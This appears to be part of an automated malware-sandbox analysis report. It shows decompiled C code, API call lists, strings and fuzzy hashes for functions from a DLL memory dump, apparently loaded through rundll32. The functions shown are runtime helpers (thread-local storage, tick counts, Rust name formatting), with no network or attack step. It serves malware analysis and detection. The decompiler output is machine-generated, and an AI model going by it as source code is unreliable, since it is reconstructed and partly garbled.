                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: a8e7cfa28b768a7e9dfab22d3dff97f080de312b417927075f686e148e8236bd
                          • Instruction ID: 548896d50bc058d161139d7ef5940b4615d3d510b9ab2819f5084f20da2567ac
                          • Opcode Fuzzy Hash: a8e7cfa28b768a7e9dfab22d3dff97f080de312b417927075f686e148e8236bd
                          • Instruction Fuzzy Hash: 04212B7A901525ABDB119AB5EC94F4A3778EB43FA4F110113F915A7384D730E909C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BCCFF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E6E4BCCFF(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6e4fa4c0 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6E4BDEBB(_t13, __eflags,  *0x6e4fa4c0);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E4BDEF6(_t14, __eflags,  *0x6e4fa4c0, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6E4BF601();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E4BDEF6(_t18, __eflags,  *0x6e4fa4c0, 0);
								} else {
									_t8 = E6E4BDEF6(_t18, __eflags,  *0x6e4fa4c0, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6E4BF548(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}












                          0x6e4bccff
                          0x6e4bcd06
                          0x6e4bcd19
                          0x6e4bcd20
                          0x6e4bcd22
                          0x6e4bcd23
                          0x6e4bcd26
                          0x6e4bcd3f
                          0x6e4bcd3f
                          0x6e4bcd28
                          0x6e4bcd28
                          0x6e4bcd2a
                          0x6e4bcd34
                          0x6e4bcd3b
                          0x6e4bcd3d
                          0x6e4bcd44
                          0x6e4bcd4d
                          0x6e4bcd50
                          0x6e4bcd51
                          0x6e4bcd53
                          0x6e4bcd67
                          0x6e4bcd67
                          0x6e4bcd70
                          0x6e4bcd55
                          0x6e4bcd5c
                          0x6e4bcd62
                          0x6e4bcd63
                          0x6e4bcd65
                          0x6e4bcd79
                          0x6e4bcd7b
                          0x6e4bcd7b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bcd65
                          0x6e4bcd7e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bcd3d
                          0x6e4bcd2a
                          0x6e4bcd86
                          0x6e4bcd90
                          0x6e4bcd08
                          0x6e4bcd0a
                          0x6e4bcd0a

                          APIs
                          • GetLastError.KERNEL32(00000001,?,6E4BCA41,6E4BA8E2,6E4BA0EC,?,6E4BA324,?,00000001,?,?,00000001,?,6E4F7DA8,0000000C,6E4BA41D), ref: 6E4BCD0D
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4BCD1B
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4BCD34
                          • SetLastError.KERNEL32(00000000,6E4BA324,?,00000001,?,?,00000001,?,6E4F7DA8,0000000C,6E4BA41D,?,00000001,?), ref: 6E4BCD86
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: a4fe2d643ea31d5e715b95a997c4a94ca511a71ec184ce823754269b2ecc0c80
                          • Instruction ID: efdf55ce105f0e81f39735695ef15ec613e327e059889fef387d055c4b442133
                          • Opcode Fuzzy Hash: a4fe2d643ea31d5e715b95a997c4a94ca511a71ec184ce823754269b2ecc0c80
                          • Instruction Fuzzy Hash: F5012836129E115EEA5426FE7CC8D872A5CEF83BB8720032FE528992D0FF31881155B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B97A0, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E4B9E50: GetTickCount64.KERNEL32 ref: 6E4B9E57
                          • GetTickCount64.KERNEL32 ref: 6E4B97D6
                          • GetTickCount64.KERNEL32 ref: 6E4B97F4
                          • GetTickCount64.KERNEL32 ref: 6E4B980D
                          • GetTickCount64.KERNEL32 ref: 6E4B980F
                          • GetTickCount64.KERNEL32 ref: 6E4B9816
                          • GetTickCount64.KERNEL32 ref: 6E4B9834
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick
                          • String ID:
                          • API String ID: 1927824332-0
                          • Opcode ID: f41c7a8564e1dd0c34a4a20f5e284bd5cb03bc16849a4ab0270ef9a348e9abaa
                          • Instruction ID: 2e4fda0c1026e19a19d22420e02329f38251de77250fc1fd30c82348cb5a945f
                          • Opcode Fuzzy Hash: f41c7a8564e1dd0c34a4a20f5e284bd5cb03bc16849a4ab0270ef9a348e9abaa
                          • Instruction Fuzzy Hash: A1012D12C24A5899D603BA7AB841645BA6D6FE77D4B16C313A04B77002FFA114F396A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A6D10, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E6E4A6D10(short* __ecx, signed int __edx) {
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t37;
				short _t38;
				void* _t39;
				signed int _t45;
				short _t50;
				void* _t51;
				short _t52;
				signed int _t53;
				signed int _t62;
				unsigned int _t66;
				char* _t78;
				signed int _t85;
				signed short _t88;
				intOrPtr _t90;
				char* _t91;
				void* _t94;
				void* _t95;
				intOrPtr* _t96;

				_t96 = _t95 - 0x30;
				_t90 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t90 == 0) {
					L6:
					_t52 = 0;
					L7:
					return _t52;
				}
				_push(1);
				_t30 = E6E4A1DE0(_t90,  &M6E4ECBA9);
				_t96 = _t96 + 4;
				_t52 = 1;
				if(_t30 != 0) {
					goto L7;
				}
				if((__edx |  *(_t96 + 0x44)) == 0) {
					_push(1);
					return E6E4A1DE0(_t90, "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool");
				}
				 *_t96 = _t90;
				_t91 = 0;
				_t62 =  *((intOrPtr*)(__ecx + 0x18)) - __edx;
				asm("sbb esi, eax");
				if(_t62 >= 0) {
					__eflags = _t62 - 0x1a;
					asm("sbb eax, 0x0");
					if(_t62 >= 0x1a) {
						_t85 = _t62;
						_t78 = "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool";
						_push(1);
						_t34 = E6E4A1DE0( *_t96, _t78);
						_t96 = _t96 + 4;
						__eflags = _t34;
						if(_t34 != 0) {
							goto L7;
						}
						__eflags = _t85 - 0x2710;
						_t53 = _t85;
						asm("sbb eax, 0x0");
						if(_t85 < 0x2710) {
							_t36 = 0x27;
							L18:
							__eflags = _t53 - 0x63;
							if(_t53 > 0x63) {
								_t66 = _t53 & 0x0000ffff;
								_t53 = (_t66 >> 2) * 0x147b >> 0x11;
								 *((short*)(_t96 + _t36 + 6)) =  *((_t66 - _t53 * 0x00000064 & 0x0000ffff) + (_t66 - _t53 * 0x00000064 & 0x0000ffff) + 0x6e4eb61c) & 0x0000ffff;
								_t36 = _t36 + 0xfffffffe;
								__eflags = _t36;
							}
							__eflags = _t53 - 0xa;
							if(_t53 >= 0xa) {
								_t24 = _t53 + 0x6e4eb61c; // 0x31303030
								 *((short*)(_t96 + _t36 + 6)) =  *(_t53 + _t24) & 0x0000ffff;
								_t37 = _t36 + 0xfffffffe;
								__eflags = _t37;
							} else {
								 *((char*)(_t96 + _t36 + 7)) = _t53 + 0x30;
								_t37 = _t36 - 1;
							}
							_push(0x27 - _t37);
							_push(_t96 + _t37 + 8);
							_push(0);
							_t38 = E6E4A1AA0( *_t96, 0x6e4ecd60);
							_t96 = _t96 + 0xc;
							_t52 = _t38;
							goto L7;
						}
						_t39 = 0x27;
						do {
							_t94 = _t39;
							_t88 = E6E4B9F10(_t53, _t91, 0x2710, 0);
							 *(_t96 + 4) = E6E4B9F90(_t53, _t91, 0x2710, 0);
							_t45 = ((_t88 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
							_t8 = _t45 + 0x6e4eb61c; // 0x31303030
							__eflags = 0x5f5e0ff - _t53;
							_t53 =  *(_t96 + 4);
							asm("sbb ecx, esi");
							_t91 = _t78;
							 *((short*)(_t96 + _t94 + 4)) =  *(_t45 + _t8) & 0x0000ffff;
							 *((short*)(_t96 + _t94 + 6)) =  *((_t88 - _t45 * 0x00000064 & 0x0000ffff) + (_t88 - _t45 * 0x00000064 & 0x0000ffff) + 0x6e4eb61c) & 0x0000ffff;
							_t16 = _t94 - 4; // 0x23
							_t39 = _t16;
						} while (__eflags < 0);
						goto L18;
					}
					 *((intOrPtr*)(_t96 + 8)) = _t62 + 0x61;
					_t50 = E6E4A3660(_t96 + 8, _t96 + 8,  *_t96);
					_t96 = _t96 + 8;
					_t52 = _t50;
					goto L7;
				}
				_push(0x10);
				_t51 = E6E4A1DE0( *_t96,  &M6E4ECB85);
				_t96 = _t96 + 4;
				if(_t51 != 0) {
					goto L7;
				}
				 *__ecx = 1;
				goto L6;
			}
























                          0x6e4a6d14
                          0x6e4a6d17
                          0x6e4a6d1c
                          0x6e4a6d6c
                          0x6e4a6d6c
                          0x6e4a6d6e
                          0x00000000
                          0x6e4a6d70
                          0x6e4a6d29
                          0x6e4a6d2b
                          0x6e4a6d30
                          0x6e4a6d33
                          0x6e4a6d37
                          0x00000000
                          0x00000000
                          0x6e4a6d41
                          0x6e4a6d7f
                          0x00000000
                          0x6e4a6d86
                          0x6e4a6d46
                          0x6e4a6d49
                          0x6e4a6d4b
                          0x6e4a6d4d
                          0x6e4a6d4f
                          0x6e4a6d8b
                          0x6e4a6d90
                          0x6e4a6d93
                          0x6e4a6db0
                          0x6e4a6db5
                          0x6e4a6dba
                          0x6e4a6dbc
                          0x6e4a6dc1
                          0x6e4a6dc4
                          0x6e4a6dc6
                          0x00000000
                          0x00000000
                          0x6e4a6dc8
                          0x6e4a6dd0
                          0x6e4a6dd2
                          0x6e4a6dd5
                          0x6e4a6e50
                          0x6e4a6e55
                          0x6e4a6e55
                          0x6e4a6e58
                          0x6e4a6e5a
                          0x6e4a6e68
                          0x6e4a6e7b
                          0x6e4a6e80
                          0x6e4a6e80
                          0x6e4a6e80
                          0x6e4a6e83
                          0x6e4a6e86
                          0x6e4a6e92
                          0x6e4a6e9a
                          0x6e4a6e9f
                          0x6e4a6e9f
                          0x6e4a6e88
                          0x6e4a6e8b
                          0x6e4a6e8f
                          0x6e4a6e8f
                          0x6e4a6eb5
                          0x6e4a6eb6
                          0x6e4a6eb7
                          0x6e4a6eb9
                          0x6e4a6ebe
                          0x6e4a6ec1
                          0x00000000
                          0x6e4a6ec1
                          0x6e4a6dd7
                          0x6e4a6de0
                          0x6e4a6de0
                          0x6e4a6df0
                          0x6e4a6e00
                          0x6e4a6e10
                          0x6e4a6e16
                          0x6e4a6e25
                          0x6e4a6e27
                          0x6e4a6e30
                          0x6e4a6e32
                          0x6e4a6e34
                          0x6e4a6e44
                          0x6e4a6e49
                          0x6e4a6e49
                          0x6e4a6e49
                          0x00000000
                          0x6e4a6e4e
                          0x6e4a6d9c
                          0x6e4a6da4
                          0x6e4a6da9
                          0x6e4a6dac
                          0x00000000
                          0x6e4a6dac
                          0x6e4a6d59
                          0x6e4a6d5b
                          0x6e4a6d60
                          0x6e4a6d65
                          0x00000000
                          0x00000000
                          0x6e4a6d67
                          0x00000000

                          APIs
                          Strings
                          • _!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6E4A6D7A, 6E4A6DB5
                          • 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E4A6D24
                          • {invalid syntax}, xrefs: 6E4A6D54
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
                          • API String ID: 3839614884-2364648981
                          • Opcode ID: 67b343bd18ab190d03aa0175ed99b0ab5da52b7f956de967f0253dda682df5cc
                          • Instruction ID: dee1fd241e06f688e9198f12c8c074c6850c51aa916886d020357ec69a4b9924
                          • Opcode Fuzzy Hash: 67b343bd18ab190d03aa0175ed99b0ab5da52b7f956de967f0253dda682df5cc
                          • Instruction Fuzzy Hash: CF41AD757282104BD7248ABCD840F6AB6D5DFA47A4F00493FEA899F3D9E675C811C3A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AD1B0, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 55%
                          			E6E4AD1B0(void* __ebx, void* __edi) {
				void _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				void* _v33;
				void* _v35;
				void* _v36;
				signed int _v39;
				void* _v44;
				long _v48;
				char _v76;
				void* __esi;
				long _t30;
				void* _t32;
				long _t33;
				void* _t35;
				void* _t37;
				void* _t38;
				signed char _t43;
				signed char _t44;
				signed int _t46;
				void** _t49;
				void* _t51;
				long _t53;
				void* _t55;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t65;
				void* _t67;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;
				void* _t89;
				void* _t90;
				void* _t91;

				_t77 = __edi;
				_t55 = __ebx;
				_push(_t79);
				_t30 =  *0x6e4fa04c; // 0x0
				if(_t30 == 0) {
					_t32 = TlsGetValue(E6E4B2B10(__ebx, 0x6e4fa04c, __edi, _t79));
					__eflags = _t32 - 1;
					if(_t32 <= 1) {
						goto L5;
					} else {
						goto L4;
					}
				} else {
					_t32 = TlsGetValue(_t30);
					if(_t32 > 1) {
						L4:
						__eflags =  *_t32 - 1;
						_t82 = _t32;
						if( *_t32 == 1) {
							goto L18;
						} else {
							goto L5;
						}
					} else {
						L5:
						_t33 =  *0x6e4fa04c; // 0x0
						if(_t33 == 0) {
							_t35 = TlsGetValue(E6E4B2B10(_t55, 0x6e4fa04c, _t77, _t79));
							__eflags = _t35;
							if(_t35 != 0) {
								goto L7;
							} else {
								goto L10;
							}
						} else {
							_t35 = TlsGetValue(_t33);
							if(_t35 == 0) {
								L10:
								_t37 =  *0x6e4fadc8; // 0xb00000
								__eflags = _t37;
								if(_t37 != 0) {
									L13:
									_t38 = HeapAlloc(_t37, 0, 0xc);
									__eflags = _t38;
									if(__eflags == 0) {
										goto L20;
									} else {
										 *_t38 = 0;
										 *(_t38 + 8) = 0x6e4fa04c;
										_t82 = _t38;
										_t53 =  *0x6e4fa04c; // 0x0
										__eflags = _t53;
										if(_t53 == 0) {
											_t53 = E6E4B2B10(_t55, 0x6e4fa04c, _t77, _t82);
										}
										TlsSetValue(_t53, _t82);
										goto L17;
									}
								} else {
									_t37 = GetProcessHeap();
									__eflags = _t37;
									if(__eflags == 0) {
										L20:
										E6E4C6C30(_t55, 0xc, 4, _t77, _t79, __eflags);
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t55);
										_push(_t77);
										_push(_t79);
										_t90 = _t89 - 0x38;
										_v36 = _t90;
										_v24 = 0xffffffff;
										_v28 = E6E4B3B60;
										_v32 =  *[fs:0x0];
										 *[fs:0x0] =  &_v32;
										_v48 = 0xc;
										_v44 = 4;
										_v24 = 0;
										asm("movsd xmm0, [edx+0x10]");
										asm("movsd xmm2, [edx]");
										asm("movsd xmm1, [edx+0x8]");
										asm("movsd [ebp-0x34], xmm0");
										asm("movsd [ebp-0x3c], xmm1");
										asm("movsd [ebp-0x44], xmm2");
										_push( &_v76);
										E6E4A2320( &_v48, 0x6e4ed390);
										_t91 = _t90 + 4;
										_t43 = _v44;
										__eflags = _t43;
										if(_t43 == 0) {
											_t44 = 4;
											__eflags = 4 - 3;
											if(4 != 3) {
												_t61 = 0x6e4ed388;
											} else {
												_t65 = _v36;
												_v48 = _t65;
												_v20 = 1;
												 *((intOrPtr*)( *((intOrPtr*)(_t65 + 4))))( *_t65);
												_t91 = _t91 + 4;
												_t49 = _v48;
												_t67 = _t49[1];
												__eflags =  *(_t67 + 4);
												if( *(_t67 + 4) != 0) {
													_t51 =  *_t49;
													__eflags =  *((intOrPtr*)(_t67 + 8)) - 9;
													if( *((intOrPtr*)(_t67 + 8)) >= 9) {
														_t51 =  *(_t51 - 4);
													}
													HeapFree( *0x6e4fadc8, 0, _t51);
												}
												HeapFree( *0x6e4fadc8, 0, _v36);
												_t61 = 0x6e4ed388;
												_t44 = 4;
											}
											goto L32;
										} else {
											__eflags = _t43 - 4;
											if(_t43 != 4) {
												_t44 = _t43;
												_t63 = _v39;
											} else {
												_t61 = 0x6e4ed388;
												_t44 = 2;
												L32:
												_t63 = _t61 << 0x00000018 | 0x00000028;
												__eflags = _t63;
											}
										}
										_t46 = _t44 & 0x000000ff | _t63 << 0x00000008;
										__eflags = _t46;
										 *[fs:0x0] = _v28;
										return _t46;
									} else {
										 *0x6e4fadc8 = _t37;
										goto L13;
									}
								}
							} else {
								L7:
								_t80 = 0;
								if(_t35 != 1) {
									_t82 = _t35;
									L17:
									 *_t82 = 1;
									 *(_t82 + 4) = 0;
									L18:
									_t80 = _t82 + 4;
								}
								return _t80;
							}
						}
					}
				}
			}







































                          0x6e4ad1b0
                          0x6e4ad1b0
                          0x6e4ad1b0
                          0x6e4ad1b1
                          0x6e4ad1b8
                          0x6e4ad1d3
                          0x6e4ad1d9
                          0x6e4ad1dc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad1ba
                          0x6e4ad1bb
                          0x6e4ad1c4
                          0x6e4ad1de
                          0x6e4ad1de
                          0x6e4ad1e1
                          0x6e4ad1e3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad1c6
                          0x6e4ad1e9
                          0x6e4ad1e9
                          0x6e4ad1f0
                          0x6e4ad213
                          0x6e4ad219
                          0x6e4ad21b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad1f2
                          0x6e4ad1f3
                          0x6e4ad1fb
                          0x6e4ad21d
                          0x6e4ad21d
                          0x6e4ad222
                          0x6e4ad224
                          0x6e4ad234
                          0x6e4ad239
                          0x6e4ad23e
                          0x6e4ad240
                          0x00000000
                          0x6e4ad242
                          0x6e4ad242
                          0x6e4ad248
                          0x6e4ad24f
                          0x6e4ad251
                          0x6e4ad256
                          0x6e4ad258
                          0x6e4ad25f
                          0x6e4ad25f
                          0x6e4ad266
                          0x00000000
                          0x6e4ad266
                          0x6e4ad226
                          0x6e4ad226
                          0x6e4ad22b
                          0x6e4ad22d
                          0x6e4ad280
                          0x6e4ad28a
                          0x6e4ad28f
                          0x6e4ad291
                          0x6e4ad292
                          0x6e4ad293
                          0x6e4ad294
                          0x6e4ad295
                          0x6e4ad296
                          0x6e4ad297
                          0x6e4ad298
                          0x6e4ad299
                          0x6e4ad29a
                          0x6e4ad29b
                          0x6e4ad29c
                          0x6e4ad29d
                          0x6e4ad29e
                          0x6e4ad29f
                          0x6e4ad2a3
                          0x6e4ad2a4
                          0x6e4ad2a5
                          0x6e4ad2a6
                          0x6e4ad2a9
                          0x6e4ad2ac
                          0x6e4ad2b3
                          0x6e4ad2c4
                          0x6e4ad2c7
                          0x6e4ad2d0
                          0x6e4ad2d3
                          0x6e4ad2d7
                          0x6e4ad2e1
                          0x6e4ad2e6
                          0x6e4ad2ea
                          0x6e4ad2f4
                          0x6e4ad2f9
                          0x6e4ad2fe
                          0x6e4ad303
                          0x6e4ad304
                          0x6e4ad309
                          0x6e4ad30c
                          0x6e4ad30f
                          0x6e4ad311
                          0x6e4ad329
                          0x6e4ad32b
                          0x6e4ad32e
                          0x6e4ad39f
                          0x6e4ad330
                          0x6e4ad330
                          0x6e4ad335
                          0x6e4ad33b
                          0x6e4ad343
                          0x6e4ad345
                          0x6e4ad348
                          0x6e4ad34b
                          0x6e4ad34e
                          0x6e4ad352
                          0x6e4ad354
                          0x6e4ad356
                          0x6e4ad35a
                          0x6e4ad35c
                          0x6e4ad35c
                          0x6e4ad368
                          0x6e4ad368
                          0x6e4ad378
                          0x6e4ad37d
                          0x6e4ad387
                          0x6e4ad387
                          0x00000000
                          0x6e4ad313
                          0x6e4ad313
                          0x6e4ad316
                          0x6e4ad393
                          0x6e4ad39a
                          0x6e4ad318
                          0x6e4ad318
                          0x6e4ad322
                          0x6e4ad3a9
                          0x6e4ad3af
                          0x6e4ad3af
                          0x6e4ad3af
                          0x6e4ad316
                          0x6e4ad3bf
                          0x6e4ad3bf
                          0x6e4ad3c1
                          0x6e4ad3cf
                          0x6e4ad22f
                          0x6e4ad22f
                          0x00000000
                          0x6e4ad22f
                          0x6e4ad22d
                          0x6e4ad1fd
                          0x6e4ad1fd
                          0x6e4ad1fd
                          0x6e4ad202
                          0x6e4ad204
                          0x6e4ad26c
                          0x6e4ad26c
                          0x6e4ad272
                          0x6e4ad279
                          0x6e4ad279
                          0x6e4ad279
                          0x6e4ad27f
                          0x6e4ad27f
                          0x6e4ad1fb
                          0x6e4ad1f0
                          0x6e4ad1c4

                          APIs
                          • TlsGetValue.KERNEL32(00000000,00000001,6E4AC906), ref: 6E4AD1BB
                          • TlsGetValue.KERNEL32(00000000,00000001,6E4AC906), ref: 6E4AD1D3
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4AD1F3
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4AD213
                          • GetProcessHeap.KERNEL32 ref: 6E4AD226
                          • HeapAlloc.KERNEL32(00B00000,00000000,0000000C), ref: 6E4AD239
                          • TlsSetValue.KERNEL32(00000000,00000000,00B00000,00000000,0000000C), ref: 6E4AD266
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value$Heap$AllocProcess
                          • String ID:
                          • API String ID: 3559649508-0
                          • Opcode ID: 72b6c06bab867ffa5816bce8bfee9687fd6832bd63fc0d77015b7ab13ead2e41
                          • Instruction ID: 0faf63b7efc6935580d24fe6cec58e44401c5a52dfdf9e02507d33fd3247c919
                          • Opcode Fuzzy Hash: 72b6c06bab867ffa5816bce8bfee9687fd6832bd63fc0d77015b7ab13ead2e41
                          • Instruction Fuzzy Hash: C011C371600201DBEB506FF9A818F56329DAF55A69F020827DE01D7388DB35E800DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C0EB1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4C0EB1(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E6E4C19B3(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E6E4C0D08(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E6E4BF8B5(GetLastError());
									_t18 =  *((intOrPtr*)(E6E4BF90F()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E6E4C0F73(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6E4BF8B5(GetLastError());
						_t18 =  *((intOrPtr*)(E6E4BF90F()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E6E4C0F73(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6E4C0F9A(_a8);
				return 0;
			}









                          0x6e4c0eb7
                          0x6e4c0ebc
                          0x6e4c0ed3
                          0x6e4c0f05
                          0x6e4c0f0f
                          0x6e4c0f28
                          0x6e4c0f2e
                          0x6e4c0f3c
                          0x6e4c0f49
                          0x6e4c0f50
                          0x6e4c0f69
                          0x6e4c0f6c
                          0x6e4c0f52
                          0x6e4c0f59
                          0x6e4c0f64
                          0x6e4c0f64
                          0x6e4c0f6e
                          0x6e4c0f6f
                          0x00000000
                          0x6e4c0f6f
                          0x6e4c0f33
                          0x6e4c0f3a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4c0f3a
                          0x6e4c0f18
                          0x6e4c0f23
                          0x00000000
                          0x6e4c0f23
                          0x6e4c0ed5
                          0x6e4c0edb
                          0x6e4c0eee
                          0x6e4c0ef1
                          0x6e4c0ef3
                          0x6e4c0ef5
                          0x00000000
                          0x6e4c0ef5
                          0x6e4c0ee1
                          0x6e4c0ee8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4c0ee8
                          0x6e4c0ec1
                          0x00000000

                          Strings
                          • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E4C0ECD
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: C:\Windows\SysWOW64\rundll32.exe
                          • API String ID: 0-2837366778
                          • Opcode ID: fee0dd75781ff35e86e585caf85a2384c81804d3732b1ce24be267beea60a22a
                          • Instruction ID: 58873ac171be0e0c326df2612fbc5afdf7e0e8277fba1dc7187cfae9f103922c
                          • Opcode Fuzzy Hash: fee0dd75781ff35e86e585caf85a2384c81804d3732b1ce24be267beea60a22a
                          • Instruction Fuzzy Hash: 7521A7B9618215BF97409FF5CC40D9B777DEF49B68B10491BE818D7240F7B1E88187A2
